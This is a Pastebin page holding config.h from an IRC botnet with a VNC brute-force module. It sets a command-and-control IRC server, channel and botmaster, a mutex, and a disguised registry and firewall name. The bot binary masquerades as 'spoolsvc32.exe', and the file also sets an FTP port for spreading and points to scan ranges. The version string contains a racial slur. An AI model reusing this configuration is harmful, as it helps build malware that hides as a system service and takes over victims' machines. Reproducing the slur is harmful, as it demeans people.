Advertisement
FlyFar

config.h

Dec 23rd, 2023
447
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 0.93 KB | Cybersecurity | 0 0
  1. /*
  2.  *      config.h 2007 Ravo_5002
  3.  *      This code is for educational purposes only...
  4.  */
  5.  
  6. #define SERVER "efnet.xs4all.nl"                    // irc server hostname
  7. #define PORT 6667                               // irc server port
  8. #define CHANNEL "#LOLOLOLOL"                        // irc channel
  9. #define BOTMASTER "Ravo_5002"                   // nick/partial hostmask of ownet
  10. #define MUTEX   "phrantic1337"                  // mutex, to prevent multiple copies running
  11. #define REGNAME "Windows VNC Masking Device"            // this is what the bot will be called in the firewall and registry
  12. #define THREADS 15                      // maximum number of threads to be created... (15 is ok for most srvs...)
  13. #define BOTNAME "spoolsvc32.exe"                        // file to retieve from the ftp server.. this is also the botfile name
  14. #define FTPPORT 30772                           // port the ftp will run on...
  15. #define VERSION "niggerbot v0.15b by Ravo_5002 VNCBRUTE MOD"    // bot version
  16.  
  17. /*
  18.  at line 321 in niggerbot.c you can change some shit for ranges to scan...
  19. */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement